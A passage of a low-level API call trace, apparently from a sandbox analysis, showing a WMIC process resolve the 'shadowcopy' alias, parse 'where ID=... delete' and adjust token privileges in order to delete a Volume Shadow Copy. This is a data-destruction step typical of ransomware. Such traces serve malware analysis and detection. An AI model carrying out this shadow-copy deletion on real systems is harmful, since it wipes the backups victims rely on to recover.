lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff2529a0 | out: ppNamespace=0xff2529a0*=0x1f63b28) returned 0x0 [0107.157] free (_Block=0x52cae0) [0107.157] free (_Block=0x52cbe0) [0107.157] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0107.157] GetCurrentThreadId () returned 0x788 [0107.157] ??0CHString@@QEAA@XZ () returned 0x16f8f0 [0107.157] malloc (_Size=0x18) returned 0x52cbe0 [0107.157] malloc (_Size=0x18) returned 0x52cae0 [0107.157] malloc (_Size=0x18) returned 0x52cb80 [0107.157] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0107.157] malloc (_Size=0x3a) returned 0x52cfa0 [0107.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff1e1980, cbMultiByte=-1, lpWideCharStr=0x52cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0107.157] free (_Block=0x52cfa0) [0107.157] malloc (_Size=0x18) returned 0x52cba0 [0107.157] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0107.157] SysStringLen (param_1="shadowcopy") returned 0xa [0107.158] malloc (_Size=0x18) returned 0x52cbc0 [0107.158] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0107.158] SysStringLen (param_1="'") returned 0x1 [0107.158] free (_Block=0x52cba0) [0107.158] free (_Block=0x52cb80) [0107.158] free (_Block=0x52cae0) [0107.158] free (_Block=0x52cbe0) [0107.158] IWbemServices:GetObject (in: This=0x1f63a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x16f8f8*=0x0, ppCallResult=0x0 | out: ppObject=0x16f8f8*=0x1f704e0, ppCallResult=0x0) returned 0x0 [0107.166] malloc (_Size=0x18) returned 0x52cbe0 [0107.166] IWbemClassObject:Get (in: This=0x1f704e0, wszName="Target", lFlags=0, pVal=0x16f820*(varType=0x0, wReserved1=0xff25, wReserved2=0x0, wReserved3=0x0, varVal1=0xff252998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f820*(varType=0x8, wReserved1=0xff25, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0107.166] free (_Block=0x52cbe0) [0107.166] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0107.166] malloc (_Size=0x3e) returned 0x52cfa0 [0107.166] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0107.166] malloc (_Size=0x18) returned 0x52cbe0 [0107.166] IWbemClassObject:Get (in: This=0x1f704e0, wszName="PWhere", lFlags=0, pVal=0x16f820*(varType=0x0, wReserved1=0xff25, wReserved2=0x0, wReserved3=0x0, varVal1=0x26e298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f820*(varType=0x8, wReserved1=0xff25, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0107.166] free (_Block=0x52cbe0) [0107.166] lstrlenW (lpString=" Where ID = '#'") returned 15 [0107.166] malloc (_Size=0x20) returned 0x52cff0 [0107.166] lstrlenW (lpString=" Where ID = '#'") returned 15 [0107.167] malloc (_Size=0x18) returned 0x52cbe0 [0107.167] IWbemClassObject:Get (in: This=0x1f704e0, wszName="Connection", lFlags=0, pVal=0x16f820*(varType=0x0, wReserved1=0xff25, wReserved2=0x0, wReserved3=0x0, varVal1=0x2bbd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f820*(varType=0xd, wReserved1=0xff25, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f709c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0107.167] free (_Block=0x52cbe0) [0107.167] IUnknown:QueryInterface (in: This=0x1f709c0, riid=0xff1e7360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x16f810 | out: ppvObject=0x16f810*=0x1f709c0) returned 0x0 [0107.167] GetCurrentThreadId () returned 0x788 [0107.167] ??0CHString@@QEAA@XZ () returned 0x16f738 [0107.167] malloc (_Size=0x18) returned 0x52cbe0 [0107.167] IWbemClassObject:Get (in: This=0x1f709c0, wszName="Namespace", lFlags=0, pVal=0x16f760*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff1f738f, varVal2=0x52cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f760*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x52cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0107.167] free (_Block=0x52cbe0) [0107.167] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0107.167] malloc (_Size=0x16) returned 0x52cbe0 [0107.167] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0107.167] malloc (_Size=0x18) returned 0x52cae0 [0107.167] IWbemClassObject:Get (in: This=0x1f709c0, wszName="Locale", lFlags=0, pVal=0x16f760*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ea6b8, varVal2=0x52cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f760*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x52cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0107.167] free (_Block=0x52cae0) [0107.167] lstrlenW (lpString="ms_409") returned 6 [0107.168] malloc (_Size=0xe) returned 0x52cae0 [0107.168] lstrlenW (lpString="ms_409") returned 6 [0107.168] malloc (_Size=0x18) returned 0x52cb80 [0107.168] IWbemClassObject:Get (in: This=0x1f709c0, wszName="User", lFlags=0, pVal=0x16f760*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ea6b8, varVal2=0x52cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f760*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ea6b8, varVal2=0x52cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0107.168] free (_Block=0x52cb80) [0107.168] malloc (_Size=0x18) returned 0x52cb80 [0107.168] IWbemClassObject:Get (in: This=0x1f709c0, wszName="Password", lFlags=0, pVal=0x16f760*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ea6b8, varVal2=0x52cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f760*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ea6b8, varVal2=0x52cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0107.168] free (_Block=0x52cb80) [0107.168] malloc (_Size=0x18) returned 0x52cb80 [0107.168] IWbemClassObject:Get (in: This=0x1f709c0, wszName="Server", lFlags=0, pVal=0x16f760*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ea6b8, varVal2=0x52cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f760*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x52cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0107.168] free (_Block=0x52cb80) [0107.168] lstrlenW (lpString=".") returned 1 [0107.168] malloc (_Size=0x4) returned 0x527140 [0107.168] lstrlenW (lpString=".") returned 1 [0107.168] malloc (_Size=0x18) returned 0x52cb80 [0107.168] IWbemClassObject:Get (in: This=0x1f709c0, wszName="Authority", lFlags=0, pVal=0x16f760*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ea6b8, varVal2=0x52cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f760*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ea6b8, varVal2=0x52cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0107.168] free (_Block=0x52cb80) [0107.168] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0107.168] IUnknown:Release (This=0x1f709c0) returned 0x1 [0107.169] GetCurrentThreadId () returned 0x788 [0107.169] ??0CHString@@QEAA@XZ () returned 0x16f738 [0107.169] malloc (_Size=0x18) returned 0x52cb80 [0107.169] IWbemClassObject:Get (in: This=0x1f704e0, wszName="__RELPATH", lFlags=0, pVal=0x16f760*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ea6b8, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x16f760*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0107.169] free (_Block=0x52cb80) [0107.169] malloc (_Size=0x18) returned 0x52cb80 [0107.169] GetCurrentThreadId () returned 0x788 [0107.169] ??0CHString@@QEAA@XZ () returned 0x16f5b8 [0107.169] ??0CHString@@QEAA@PEBG@Z () returned 0x16f5d0 [0107.169] ??0CHString@@QEAA@AEBV0@@Z () returned 0x16f560 [0107.169] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0107.169] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x52d020 [0107.169] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0107.169] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x16f520 [0107.169] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x16f568 [0107.169] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f5d0 [0107.170] ??1CHString@@QEAA@XZ () returned 0x3b7cec01 [0107.170] ??1CHString@@QEAA@XZ () returned 0x3b7cec01 [0107.170] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x16f528 [0107.170] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f560 [0107.170] ??1CHString@@QEAA@XZ () returned 0x1 [0107.170] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x52d090 [0107.170] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0107.170] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x16f520 [0107.170] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x16f568 [0107.170] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f5d0 [0107.170] ??1CHString@@QEAA@XZ () returned 0x3b7cec01 [0107.170] ??1CHString@@QEAA@XZ () returned 0x3b7cec01 [0107.170] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x16f528 [0107.170] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f560 [0107.170] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0107.170] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0107.170] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0107.170] malloc (_Size=0x18) returned 0x52cba0 [0107.170] malloc (_Size=0x18) returned 0x52cc00 [0107.170] malloc (_Size=0x18) returned 0x52cc20 [0107.170] malloc (_Size=0x18) returned 0x52cc40 [0107.170] malloc (_Size=0x18) returned 0x52cc60 [0107.170] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0107.170] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0107.170] malloc (_Size=0x18) returned 0x52cc80 [0107.170] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0107.171] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0107.171] malloc (_Size=0x18) returned 0x52cca0 [0107.171] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0107.171] SysStringLen (param_1="\"") returned 0x1 [0107.171] free (_Block=0x52cc80) [0107.171] free (_Block=0x52cc60) [0107.171] free (_Block=0x52cc40) [0107.171] free (_Block=0x52cc20) [0107.171] free (_Block=0x52cc00) [0107.171] free (_Block=0x52cba0) [0107.171] IWbemServices:GetObject (in: This=0x1f63b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x16f5a8*=0x0, ppCallResult=0x0 | out: ppObject=0x16f5a8*=0x1f70a50, ppCallResult=0x0) returned 0x0 [0107.173] malloc (_Size=0x18) returned 0x52cba0 [0107.173] IWbemClassObject:Get (in: This=0x1f70a50, wszName="Text", lFlags=0, pVal=0x16f5e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff252ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x16f5e0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4b10*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x26e030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0107.173] free (_Block=0x52cba0) [0107.173] SafeArrayGetLBound (in: psa=0x2e4b10, nDim=0x1, plLbound=0x16f5c0 | out: plLbound=0x16f5c0) returned 0x0 [0107.173] SafeArrayGetUBound (in: psa=0x2e4b10, nDim=0x1, plUbound=0x16f5b0 | out: plUbound=0x16f5b0) returned 0x0 [0107.173] SafeArrayGetElement (in: psa=0x2e4b10, rgIndices=0x16f5a4, pv=0x16f5f8 | out: pv=0x16f5f8) returned 0x0 [0107.173] malloc (_Size=0x18) returned 0x52cba0 [0107.173] malloc (_Size=0x18) returned 0x52cc00 [0107.173] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0107.173] free (_Block=0x52cba0) [0107.173] IUnknown:Release (This=0x1f70a50) returned 0x0 [0107.173] free (_Block=0x52cca0) [0107.173] ??1CHString@@QEAA@XZ () returned 0x3b7cec01 [0107.173] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0107.174] free (_Block=0x52cb80) [0107.174] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0107.174] lstrlenW (lpString="Shadow copy management.") returned 23 [0107.174] malloc (_Size=0x30) returned 0x5285c0 [0107.174] lstrlenW (lpString="Shadow copy management.") returned 23 [0107.174] free (_Block=0x52cc00) [0107.174] IUnknown:Release (This=0x1f704e0) returned 0x0 [0107.174] free (_Block=0x52cbc0) [0107.174] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0107.174] lstrlenW (lpString="PATH") returned 4 [0107.174] lstrlenW (lpString="where") returned 5 [0107.174] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0107.174] lstrlenW (lpString="WHERE") returned 5 [0107.174] lstrlenW (lpString="where") returned 5 [0107.174] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0107.174] lstrlenW (lpString="/") returned 1 [0107.174] lstrlenW (lpString="ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'") returned 43 [0107.174] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0107.174] lstrlenW (lpString="-") returned 1 [0107.174] lstrlenW (lpString="ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'") returned 43 [0107.174] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0107.174] lstrlenW (lpString="ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'") returned 43 [0107.174] malloc (_Size=0x58) returned 0x52d020 [0107.174] lstrlenW (lpString="ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'") returned 43 [0107.175] lstrlenW (lpString="/") returned 1 [0107.175] lstrlenW (lpString="delete") returned 6 [0107.175] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0107.175] lstrlenW (lpString="-") returned 1 [0107.175] lstrlenW (lpString="delete") returned 6 [0107.175] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0107.175] lstrlenW (lpString="delete") returned 6 [0107.175] malloc (_Size=0xe) returned 0x52cbc0 [0107.175] lstrlenW (lpString="delete") returned 6 [0107.175] lstrlenW (lpString="GET") returned 3 [0107.175] lstrlenW (lpString="delete") returned 6 [0107.175] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0107.175] lstrlenW (lpString="LIST") returned 4 [0107.175] lstrlenW (lpString="delete") returned 6 [0107.175] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0107.175] lstrlenW (lpString="SET") returned 3 [0107.175] lstrlenW (lpString="delete") returned 6 [0107.175] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0107.175] lstrlenW (lpString="CREATE") returned 6 [0107.175] lstrlenW (lpString="delete") returned 6 [0107.175] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0107.175] lstrlenW (lpString="CALL") returned 4 [0107.175] lstrlenW (lpString="delete") returned 6 [0107.175] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0107.175] lstrlenW (lpString="ASSOC") returned 5 [0107.175] lstrlenW (lpString="delete") returned 6 [0107.175] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0107.175] lstrlenW (lpString="DELETE") returned 6 [0107.175] lstrlenW (lpString="delete") returned 6 [0107.176] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0107.176] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0107.176] malloc (_Size=0x3e) returned 0x52d080 [0107.176] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0107.176] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0107.176] malloc (_Size=0x18) returned 0x52cc00 [0107.176] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0107.176] lstrlenW (lpString="FROM") returned 4 [0107.176] lstrlenW (lpString="*") returned 1 [0107.176] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0107.176] malloc (_Size=0x18) returned 0x52cb80 [0107.176] free (_Block=0x52cc00) [0107.176] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0107.176] lstrlenW (lpString="FROM") returned 4 [0107.176] lstrlenW (lpString="from") returned 4 [0107.176] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0107.176] malloc (_Size=0x18) returned 0x52cc00 [0107.176] free (_Block=0x52cb80) [0107.176] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0107.176] malloc (_Size=0x18) returned 0x52cb80 [0107.177] free (_Block=0x52cc00) [0107.177] free (_Block=0x52d080) [0107.177] free (_Block=0x52cb80) [0107.177] lstrlenW (lpString="SET") returned 3 [0107.177] lstrlenW (lpString="delete") returned 6 [0107.177] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0107.177] lstrlenW (lpString="CREATE") returned 6 [0107.177] lstrlenW (lpString="delete") returned 6 [0107.177] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0107.177] free (_Block=0x52cef0) [0107.177] malloc (_Size=0x8) returned 0x526f20 [0107.177] lstrlenW (lpString="GET") returned 3 [0107.177] lstrlenW (lpString="delete") returned 6 [0107.177] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0107.177] lstrlenW (lpString="LIST") returned 4 [0107.177] lstrlenW (lpString="delete") returned 6 [0107.177] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0107.177] lstrlenW (lpString="ASSOC") returned 5 [0107.177] lstrlenW (lpString="delete") returned 6 [0107.177] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0107.177] WbemLocator:IUnknown:AddRef (This=0x1f51390) returned 0x3 [0107.177] free (_Block=0x34dfb0) [0107.177] lstrlenW (lpString="") returned 0 [0107.177] lstrlenW (lpString="XDUWTFONO") returned 9 [0107.178] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0107.178] lstrlenW (lpString="XDUWTFONO") returned 9 [0107.178] malloc (_Size=0x14) returned 0x52cb80 [0107.178] lstrlenW (lpString="XDUWTFONO") returned 9 [0107.178] GetCurrentThreadId () returned 0x788 [0107.178] GetCurrentProcess () returned 0xffffffffffffffff [0107.178] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16f980 | out: TokenHandle=0x16f980*=0x27c) returned 1 [0107.178] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16f978 | out: TokenInformation=0x0, ReturnLength=0x16f978) returned 0 [0107.178] malloc (_Size=0x118) returned 0x52d080 [0107.178] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x52d080, TokenInformationLength=0x118, ReturnLength=0x16f978 | out: TokenInformation=0x52d080, ReturnLength=0x16f978) returned 1 [0107.178] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x52d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-629346796, Attributes=0xdce3), (Luid.LowPart=0x0, Luid.HighPart=5426928, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0107.178] free (_Block=0x52d080) [0107.178] CloseHandle (hObject=0x27c) returned 1 [0107.178] lstrlenW (lpString="GET") returned 3 [0107.178] lstrlenW (lpString="delete") returned 6 [0107.178] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0107.178] lstrlenW (lpString="LIST") returned 4 [0107.178] lstrlenW (lpString="delete") returned 6 [0107.178] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0107.178] lstrlenW (lpString="SET") returned 3 [0107.178] lstrlenW (lpString="delete") returned 6 [0107.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0107.179] lstrlenW (lpString="CALL") returned 4 [0107.179] lstrlenW (lpString="delete") returned 6 [0107.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0107.179] lstrlenW (lpString="ASSOC") returned 5 [0107.179] lstrlenW (lpString="delete") returned 6 [0107.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0107.179] lstrlenW (lpString="CREATE") returned 6 [0107.179] lstrlenW (lpString="delete") returned 6 [0107.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0107.179] lstrlenW (lpString="DELETE") returned 6 [0107.179] lstrlenW (lpString="delete") returned 6 [0107.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0107.179] malloc (_Size=0x18) returned 0x52cc00 [0107.179] lstrlenA (lpString="") returned 0 [0107.179] malloc (_Size=0x2) returned 0x34dfb0 [0107.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff1e314c, cbMultiByte=-1, lpWideCharStr=0x34dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0107.179] free (_Block=0x34dfb0) [0107.179] malloc (_Size=0x18) returned 0x52cca0 [0107.179] lstrlenA (lpString="") returned 0 [0107.179] malloc (_Size=0x2) returned 0x34dfb0 [0107.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff1e314c, cbMultiByte=-1, lpWideCharStr=0x34dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0107.180] free (_Block=0x34dfb0) [0107.180] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0107.180] malloc (_Size=0x3e) returned 0x52d080 [0107.180] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0107.180] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0107.180] malloc (_Size=0x18) returned 0x52cba0 [0107.180] free (_Block=0x52cca0) [0107.180] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0107.180] lstrlenW (lpString="FROM") returned 4 [0107.180] lstrlenW (lpString="*") returned 1 [0107.180] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0107.180] malloc (_Size=0x18) returned 0x52cca0 [0107.180] free (_Block=0x52cba0) [0107.180] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0107.180] lstrlenW (lpString="FROM") returned 4 [0107.180] lstrlenW (lpString="from") returned 4 [0107.180] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0107.180] malloc (_Size=0x18) returned 0x52cba0 [0107.181] free (_Block=0x52cca0) [0107.181] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0107.181] malloc (_Size=0x18) returned 0x52cca0 [0107.181] free (_Block=0x52cba0) [0107.181] free (_Block=0x52d080) [0107.181] malloc (_Size=0x18) returned 0x52cba0 [0107.181] malloc (_Size=0x18) returned 0x52cc20 [0107.181] malloc (_Size=0x18) returned 0x52cc40 [0107.181] malloc 